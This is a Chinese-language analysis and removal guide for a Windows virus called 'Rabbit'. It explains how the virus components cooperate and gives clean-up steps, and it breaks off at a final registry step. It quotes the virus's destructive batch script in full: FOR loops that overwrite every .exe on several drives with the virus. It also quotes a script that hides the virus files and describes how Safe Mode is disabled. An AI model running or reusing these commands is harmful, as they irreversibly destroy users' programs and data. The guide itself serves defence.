工作模式：

兔子的几个文件之间存在明显的分工合作关系：

当病毒原文件Rabbit.exe被执行后，会在system32下释放出loveRabbit.exe、jk.exe和love.bat，并执行loveRabbit.exe和love.bat

先看看下面love.bat的内容吧，列出defgh分区和program files的exe文件的列表c:\windows\下的msconfig.inf和msconfig1.inf，并用两个for命令调用copy命令把列表中的exe文件全部用Rabbit.exe替换掉！需要知道这个行为比熊猫和硬盘杀手还有恨，这样丢失的数据基本上是找不回来的！

FOR   %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR   /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR   /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

其中loveRabbit.exe是比较关键的一个进程，这个病毒的大部分工作是由它做的，它负责在system32下生成msexch400.dll并插入winlogon.exe进程；不断生成loveRabbit.bat和DEFG分区根目录下面的autorun.inf文件，并执行不断loveRabbit.bat；
删除注册表项HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}和HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}，不断添加注册表项HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath；而且它还能关闭icesword和sreng等安全软件；它还能对安全模式的键值作出检查，如被修复了它立刻删除相关键值；

另外一个批处理就是被loveRabbit.exe不断执行的loveRabbit.bat，作用是不断的将病毒文件设置系统和隐藏属性；

attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf

而被插入msexch400.dll模块的winlogon.exe的线程数会不断上升，干扰正常的关机和注销，并在loveRabbit.exe被结束时由winlogon.exe重新启动；

至于jk.exe的工作就简单多了，它运行后会检查loverabbit.exe是否被关闭，如关闭了就重新运行它，之后便退出，是用于系统启动时激活病毒的进程；

还有就是在各个分区下面的autorun.inf和rabbit.exe，用于双击进入分区时重新激活病毒；

明显的分工，编写者的思路很清晰，启动用的jk.exe、主要工作进程loverabbit.exe、插入模块msexch400.dll和两个bat文件等，各有各做的事情，合作起来使得运行后病毒很难会被结束掉；



清理办法：

由于它的进程守护太好了，要关闭它实在不容易，而且安全模式被破坏了，就只有令想办法了……
方法一：但这个病毒有个疏忽的地方，就是jk.exe不能靠loverabbit.exe进行修复，而这个是系统启动是激活病毒用的，这就给了我们一个激活了；首先到system32文件夹下面删除jk.exe，不过病毒把系统大部分的exe文件都替换了，所有启动项里面一定要先进行清空然后才重启，由于病毒控制了winlogon.exe进程导致不能正常重启，所以我们就用不经过winlogon.exe的重启方式吧，打开任务管理器，然后按着ctrl再选择任务管理器的关机菜单里面的重启，这样就重启成功了，重启完成后正式清理；

方法二（推荐）：映象劫持，最近学回来的东西，嘻嘻；注册表文件的内容如下，将其导入注册表之后就可以正式清理了；

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loverabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jk.exe]
"Debugger"="dikex.exe"

正式清理：首先到文件夹选项把所有隐藏文件都显示出来，之后删除下面的文件，其中msexch400.dll需要重启或者使用unlocker等工具删除：
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
各个分区根目录下面的rabbit.exe和autorun.inf文件

在我的电脑里面搜索*.exe，把变了兔子图标的文件全部删除（他们无法挽救的了，节哀吧……）

最后删除注册表HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\下面的{4bf41072-b2b1-21c1-b5c1-0305f4155515}，导入下面注册表信息：